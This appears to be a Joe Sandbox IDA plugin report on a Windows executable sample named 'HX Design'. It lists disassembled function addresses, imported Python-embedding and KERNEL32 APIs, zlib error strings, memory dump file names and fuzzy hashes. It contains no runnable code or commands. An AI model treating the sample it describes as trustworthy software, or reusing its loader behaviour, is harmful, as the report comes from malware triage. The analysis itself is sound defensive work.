Py_Finalize, xrefs: 00007FF7320658D5, 00007FF7320658F7
PyRun_SimpleStringFlags, xrefs: 00007FF732065E0B, 00007FF732065E2D
Failed to get address for %hs, xrefs: 00007FF732065861
Py_InitializeFromConfig, xrefs: 00007FF732065903, 00007FF732065925
Py_PreInitialize, xrefs: 00007FF73206595F, 00007FF732065981
PyErr_Print, xrefs: 00007FF732065B59, 00007FF732065B7B
PyMarshal_ReadObjectFromString, xrefs: 00007FF732065C6D, 00007FF732065C8F
PyErr_NormalizeException, xrefs: 00007FF732065AFD, 00007FF732065B1F
Py_IsInitialized, xrefs: 00007FF732065931, 00007FF732065953
Py_DecRef, xrefs: 00007FF732065836, 00007FF732065858

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: 87b93f447fe19313d6a700db50923546ab4e02e049bb92a63ebf0194914f9d58
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: DE22A064A09B07B1FA58FB95A8545B6A2B0FF14B55FD41035C82E42AA0FFFCA54CF234

Function 00007FF7320840AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF7320840FA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF732084766
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320848DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF732084B9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF732084DBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF732084FF7
memcpy_s.LIBCPMT ref: 00007FF7320850D2
memcpy_s.LIBCPMT ref: 00007FF73208517D
memcpy_s.LIBCPMT ref: 00007FF73208524C

Strings

1#IND, xrefs: 00007FF7320841E7
1#QNAN, xrefs: 00007FF732084213
1#SNAN, xrefs: 00007FF73208420A
1#INF, xrefs: 00007FF732084223

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction ID: 9c95588c749f896b9c9277a1f419878915b29f69c4036d7198d2caa66872c413
Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction Fuzzy Hash: C8B2F372E182929BE774DF64D4407FEB7A1FB54388F801135DA0E57A88DFB8A908DB50

Function 00007FF73206ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid literal/length code, xrefs: 00007FF73206B3E2
invalid literal/lengths set, xrefs: 00007FF73206B133
invalid distances set, xrefs: 00007FF73206B1A0
invalid distance too far back, xrefs: 00007FF73206B670
invalid distance code, xrefs: 00007FF73206B5B4
invalid bit length repeat, xrefs: 00007FF73206B099
invalid code lengths set, xrefs: 00007FF73206AE2D
invalid code -- missing end-of-block, xrefs: 00007FF73206B0C6
too many length or distance symbols, xrefs: 00007FF73206AE46

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction ID: e816ebfa14e7d099d7c14e60fa6d6f4b5208cc68e7d68a1d8d030d05145d3dd0
Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction Fuzzy Hash: B3521572B146A69BE7A4AF14C458B7EBBEDFB44340F414139E64A93780DBBCD808DB50

Function 00007FF73206D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF73206D148
RtlCaptureContext.KERNEL32 ref: 00007FF73206D175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF73206D18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF73206D1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF73206D224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF73206D241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF73206D24C

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 1ea5c8afbb47ba66bbf64b609c14576a7989d3710ea74ba72c908db5bd70bf6f
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: DD315E72708B8596EB609F60E8803EEB360FB88704F84403ADA5E57B95DFBCD548D724

Function 00007FF73207A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF73207A68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF73207A6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF73207A6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF73207A719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF73207A723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF73207A72E

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 0f2ad1ecd311a0099d341dd3c5df9fd245612e76300dbd6449f156101301a07f
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: CE31B636608F8196DB60EF24E8402BEB3A4FB88754F900135EA9D43B65DF7CC149DB10

Function 00007FF732081874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320818C0
FindFirstFileExW.KERNEL32 ref: 00007FF7320819CA

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction ID: 87bed1b45409a0ddc2972ac7848513cb50c134a8efad4fbc837271cc7f11f1ae
Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction Fuzzy Hash: 0CB1E422B1869291EA60BB25D4001BBE3A1EF44FE4F845131EE5D57BC5EFBCE449E320

Function 00007FF73206D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF73206D03C
GetCurrentThreadId.KERNEL32 ref: 00007FF73206D04A
GetCurrentProcessId.KERNEL32 ref: 00007FF73206D056
QueryPerformanceCounter.KERNEL32 ref: 00007FF73206D066

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 1da149ebf50e52701d1fc4aadaca410253ef4374f39da23dabcf6ae84371ee9d
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 9E114C22B14B059AEB009B60E8442B973A4FB59758F840E31DA2D867A4EFB8D1A8C350

Function 00007FF732083C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF732083C76
memcpy_s.LIBCPMT ref: 00007FF732083CA1

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 085cef3da2ae0f8ca229fe1fc210479fabded604d32e3839b9c644e336786686
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: F4C10372B1868697E724DF29A04466BFBA1F788B84F818134DB4E43784DF7DE809DB40

Function 00007FF73206A474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF73206A921
, xrefs: 00007FF73206A55B
unknown header flags set, xrefs: 00007FF73206A4C5

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction ID: b8a072cdb307015c08eb6ddb8acee636edbf31f5412193eb60a3782249daed1a
Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction Fuzzy Hash: EEF1C572B083C55BE7A5BF14C088B3ABAE9FF44740F454138DA4927791CBB8E948D764

Function 00007FF732089728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF732089977
RaiseException.KERNEL32 ref: 00007FF732089988

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction ID: a6bc1ecd9cc9795e3d37afb77da4767e1bc86ae167f8cf8afe38c792723197a1
Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction Fuzzy Hash: 2AB17C73A00B89CBEB15DF29C84636D7BA0F744B48F548821DA9D83BA4CF79D455C710

Function 00007FF7320739A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF732073B12
, xrefs: 00007FF732073D54

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction ID: 50c42f16711616366c010a59ee69cd273e3c86fad0b11066653d6cb7f438c868
Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction Fuzzy Hash: 61E1E332A08646A1FB68BF3D905113DB3A0FF44B48F945235DA4E07794DFBAE859E720

Function 00007FF73206A2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF73206A442
incorrect header check, xrefs: 00007FF73206A45B

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction ID: 8fbcac0a17701b6138faad2dda130867bf35b549e05ede8840c92478f2e105d5
Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction Fuzzy Hash: 5691C772B182C69BE7A4AF14C488B3EBBA9FF44350F514139DA4A567C0CB7CE944DB24

Function 00007FF73207DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF73207DFFD
gfff, xrefs: 00007FF73207E07A

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction ID: 8116abcdba5720d40171fdaf96a5f92640c1912abf976edb3f2f488b8971184f
Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction Fuzzy Hash: D6517862B182C596E724AE39D800779EB91E744B94F888231CBA847BC5CFBDE048D710

Function 00007FF73207DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF73207DD9E

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: ca23f7b4e77834378833db50de30902c6de8582bdd42a0452b479be7f2e2c5bd
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 82A18962B0C7CA86EB21EF29A4007B9BB91EB51B84F448032DE5D47785DFBDE809D710

Function 00007FF732078794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF7320787B3

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction ID: dc287395b3f6c0687703ab1f97ff612a0a033800105cd657c0c2185d5d99d6a9
Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction Fuzzy Hash: 2E51C311F0864361FAA4BB2B694517BD290AF44BD4FC84035DE0E57BD6EEBCE41AF220

Function 00007FF732083480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF732083484

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction ID: b8102992a7ccbddad21fdd79165503ee786840b5dd6053f74ef379abfc947a61
Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction Fuzzy Hash: 29B09220E07A42E2EA483B216C8221962A4BF48700FD80138C41C80330DE6C20EAA721

Function 00007FF7320735A0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction ID: 88d2eb3ca84c9b6727bf8aa3a0f4fffa7f16292617ef37cc3b0cedfd20edc33c
Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction Fuzzy Hash: 0AD1B266A08646A5FB68BF3D804027DA7A0FB05B48FA44235CE0D077D5DFBDE849E760

Function 00007FF732069800 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
